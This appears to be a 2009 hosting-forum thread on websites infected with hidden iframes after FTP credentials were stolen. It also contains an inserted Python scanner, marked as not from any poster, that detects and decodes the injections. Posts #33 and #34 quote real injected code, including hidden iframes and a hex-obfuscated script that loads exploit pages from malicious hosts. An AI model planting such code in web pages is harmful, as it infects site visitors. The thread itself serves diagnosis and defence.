#21
You have a lot of company - over 20,000 sites!
http://www.spywareinfoforum.com/inde...owtopic=124283
Your permissions on the index file should be 644 - i.e. not writable except by owner.
Last edited by cnm; 05-30-2009 at 12:23 PM.
#22
We have seen lots of this as well, and EVERY TIME the cause has been traced to a virus on the user's machine that was either stealing their ftp credentials from their stored passwords or (more likely) sniffing their username and password during an ftp session, since ftp is a cleartext protocol. The virus would then either "phone home" or fire up its own ftp connection and dl all .htm, .html and .php files from the user's account, add its iframe or js code and reupload.
Just changing the ftp password makes no difference, since the new password is compromised the very next time they make a connection (usually to fix their pages). The only relief was to make sure their machine is virus free, and change passwords. As an addition, we also educate them to the advantages of using sftp instead of ftp and also point out that the same hijacking can occur with email passwords if they don't use encryption there too. Keep in mind that many people are mobile now and making connections from networks that they really have no business "trusting" with any clear text protocol. It's amazing how many people NEVER think about this. Encryption is your friend. Sounds paranoid? Just cuz I'm paranoid doesn't mean they're not out to get me!
__________________
David M. Shirley CDTT (Certified Duct Tape Technician) Rock Solid Linux Web Hosting http://www.webquarry.com
#23
Quote:
#24
Quote:
Thanks. Jeff
__________________
Jeff Lasman <directadmin@nobaloney.net> +1 951 643-5345 Third-Party DirectAdmin administration and support Dedicated Servers, Dedicated Reseller Accounts NoBaloney Internet Services P.O. Box 52200 Riverside, Calif. 92517
#25
Almost every firewall script allows you to insert a host or network for blocking, yes. Unfortunately each one of them has a different interface.
__________________
Martino Dell'Ambrogio <tillo@tillo.ch> http://www.tillo.ch/ Security Auditor Willing to reward my help? Visit my Amazon.com Wish List. Thanks!
#26
Just found something very interesting.
Looks like the way this person is getting server information is not through a control panel. They are gaining access to people's computers and getting the saved information on the computer. Look at the images I have attached. They show ZoneAlarm blocking incoming access to port 21 from IP address 91.212.65.147 and also from IP 62.217.53.210 (mail.lexmon.de).
#27
I don't know what this has to do with getting people's passwords. This is just an ftp scan as far as I can tell.
__________________
-------------------------------------------------- Floyd Morrissette Newwebsite.com Now specializing in OpenVZ AND XEN VPS technology
#28
Not really, the first address is the same as the one using the "stolen" access data of this thread's first poster. The second screenshot shows another FTP try from another server exactly 10 minutes after that, so I guess it's an alternative server the worm is using if the first one is blocked.
__________________
Martino Dell'Ambrogio <tillo@tillo.ch> http://www.tillo.ch/ Security Auditor Willing to reward my help? Visit my Amazon.com Wish List. Thanks!
#29
I am not sure if you were commenting on mine or fineline.
Whatever it is, it is trying to gain ftp access to a machine that does not have an ftp server, probably since it appears to be on a personal Windows machine. So even if ZoneAlarm did not block it, it still would not gain access through ftp since there is no ftp server running. That is my understanding. But that is why I am posting, so I can learn more.
__________________
-------------------------------------------------- Floyd Morrissette Newwebsite.com Now specializing in OpenVZ AND XEN VPS technology
#30
I was replying to you; I usually don't quote the last post, sorry. I found it most unlikely that the same IP address using stolen access data from a worm also does random FTP scans. I guess that machine has (or had in the past) an FTP server, and someone somewhere saved the data in an FTP client, even if obsolete or not working because now there is a firewall; that's the more likely reason for this FTP try. Also, my guess is that the worm discussed in this thread now has at least two "homes". It's getting worse/bigger.
__________________
Martino Dell'Ambrogio <tillo@tillo.ch> http://www.tillo.ch/ Security Auditor Willing to reward my help? Visit my Amazon.com Wish List. Thanks!
#31
Well, from what I can tell this is what happened to me.
I was working on a site and updating it. The next morning it had the java exploit. I fixed them and then changed passwords. Then I went to look at other sites. Didn't see the exploit. I updated another site. The next day it had the exploit. So any site that I used my FlashFXP to connect with got hit with the exploit. I fixed them and changed passwords. Scanned the computer I was working with and found some issues. Cleaned them all. After that I got the alerts about the blocks. I do use xampp on my computer to develop on. So I'm guessing that may be where it was trying to get back to my computer to try and get data from the FlashFXP stored information.
#32
Yep! I did some research for a client this morning.
It appears to be a known iframe redirect hack:
http://www.diovo.com/2009/03/hidden-...ction-attacks/
The above thread explains the problem and gives instructions on fixing, hardening, etc. You can use the following URL to see if google knows you have a problem; just replace example.com with your own domain name.
http://www.google.com/safebrowsing/d...://example.com
Jeff
__________________
Jeff Lasman <directadmin@nobaloney.net> +1 951 643-5345 Third-Party DirectAdmin administration and support Dedicated Servers, Dedicated Reseller Accounts NoBaloney Internet Services P.O. Box 52200 Riverside, Calif. 92517
#33
Guys, today over 6 - 7 different accounts on the same machine were compromised. As said in this thread, I too believe that it has something to do with the compromised computer. Most of the default files, e.g. index.htm, index.html, index.php, default.htm, got an iframe injected either at the end of the file or after the <body> tag.
Below is what got written to the files:
Code:
<iframe src="http://gianthighest.cn:8080/index.php" width=117 height=132 style="visibility: hidden"></iframe>
<iframe src="http://bestfilmlife.cn:8080/index.php" width=126 height=192 style="visibility: hidden"></iframe>
I have removed them manually at this moment. The source IP address of the FTP connection was from a different location each time. 90% of the accounts compromised were developed by an external developer who works from his home. I have asked him to uninstall the FTP client or remove our account details from the software. I have also changed the password for all these accounts.
#34
Hi,
Same problem. Most code in web pages:
Code:
<script>function vdbadxxtxYb(vbbYtYbdxxY){ return(parseInt(vbbYtYbdxxY,16));}function vybVdyatxVt(vdadaVdaxYt){ var vyYbbyatddy='';for(vbytVtYbdbY=0; vbytVtYbdbY<vdadaVdaxYt.length; vbytVtYbdbY+=2){vyYbbyatddy+=(String.fromCharCode(vdbadxxtxYb(vdadaVdaxYt.substr(vbytVtYbdbY,2))));}return vyYbbyatddy;} document.write(vybVdyatxVt('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227478596264597479746222206E616D653D225962597474626479596222207372633D22687474703A2F2F7265646469692E72752F747261666669632F73706C6F6974312F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313338383430292B2762596461567979595659222077696474683D2232363722206865696768743D2235323022207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'));</script>
I am tired of manually deleting it. Is there a free antivirus, and what is the installation method? Thanks
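Added example, not code from any poster in this thread: a small Python scan a hosting admin could run over a web root to find both injection styles described above (the plain hidden iframes after `<body>` in #33 and the hex-encoded `document.write()` wrapper in #34), decode the hex payload so the hidden iframe it writes becomes visible, and flag the default files whose mode is looser than the 644 recommended in #21. The page contents and hostnames in the samples are constructed for the example; the regexes and file-name list are my own assumptions, not anything a poster used.

```python
import os
import re
import stat
from urllib.parse import urlparse

# Constructed samples, modelled on the two injection styles reported in
# this thread (hosts are placeholders, not the ones from the posts):
# 1) a hidden <iframe> dropped straight after <body>
SAMPLE_PLAIN = (
    '<html><body>\n'
    '<iframe src="http://malicious.example:8080/index.php" width=117 '
    'height=132 style="visibility: hidden"></iframe>\n'
    '<p>Welcome</p></body></html>\n'
)
# 2) the same kind of iframe hidden behind a hex-encoded document.write()
_PAYLOAD = ('<SCRIPT>document.write(\'<iframe src="http://bad.example/x/" '
            'width="267" height="520" style="display: none;"></iframe>\')</SCRIPT>')
SAMPLE_OBFUSCATED = (
    "<script>function a(h){return(parseInt(h,16));}"
    "function b(s){var o='';for(i=0;i<s.length;i+=2)"
    "{o+=String.fromCharCode(a(s.substr(i,2)));}return o;}"
    "document.write(b('" + _PAYLOAD.encode().hex().upper() + "'));</script>"
)

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# document.write(<fn>('<hex>')): the decoder wrapper shape seen in post #34
HEX_WRITE_RE = re.compile(
    r"""document\.write\(\s*\w+\(\s*['"]([0-9A-Fa-f]{8,})['"]\s*\)\s*\)""")
# Assumed list of "default" files to check, taken from post #33
DEFAULT_FILES = ("index.htm", "index.html", "index.php", "default.htm")


def _attrs(tag_body):
    """Parse key=value attributes from inside an <iframe ...> tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(tag_body)}


def hidden_iframes(text):
    """Return (host, src) for every iframe whose style makes it invisible."""
    found = []
    for m in IFRAME_RE.finditer(text):
        a = _attrs(m.group(1))
        if HIDDEN_RE.search(a.get("style", "")):
            src = a.get("src", "")
            found.append((urlparse(src).hostname or "", src))
    return found


def decode_hex_writes(text):
    """Decode the hex payload of each document.write(fn('...')) wrapper."""
    decoded = []
    for hexstr in HEX_WRITE_RE.findall(text):
        try:
            decoded.append(bytes.fromhex(hexstr).decode("latin-1"))
        except ValueError:  # odd length or bad digit: not a real payload
            continue
    return decoded


def scan_html(text):
    """Return findings for one page as (kind, host, evidence) tuples."""
    findings = [("hidden-iframe", h, s) for h, s in hidden_iframes(text)]
    for payload in decode_hex_writes(text):
        findings.append(("hex-obfuscated-write", "", payload[:80]))
        findings += [("hidden-iframe-decoded", h, s)
                     for h, s in hidden_iframes(payload)]
    return findings


def group_or_world_writable(path):
    """True if the mode grants write to group or others (i.e. not 644-like)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def scan_tree(root, names=DEFAULT_FILES):
    """Walk root; report injected content and loose permissions per file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in names:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1") as fh:
                findings = scan_html(fh.read())
            if group_or_world_writable(path):
                mode = oct(os.stat(path).st_mode & 0o777)
                findings.append(("writable-by-group-or-others", "", mode))
            if findings:
                report[path] = findings
    return report


if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_OBFUSCATED):
        for kind, host, evidence in scan_html(sample):
            print(f"{kind:28} {host:20} {evidence}")
```

Run it against a web root with `scan_tree("/path/to/htdocs")`; the host column gives you the value to block or to look up, and a `writable-by-group-or-others` entry is the file to `chmod 644`. The decoder only handles the plain hex wrapper from #34; other obfuscators need their own decoding step, but the hidden-iframe check still catches whatever they finally write.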
#35
Try this: hxxp://www.gotroot.com/tiki-read_article.php?articleId=278
#36
Hmm, tested it on CentOS 5 but it doesn't work: mod_ext_filter.so is missing and /etc/asl/ doesn't exist.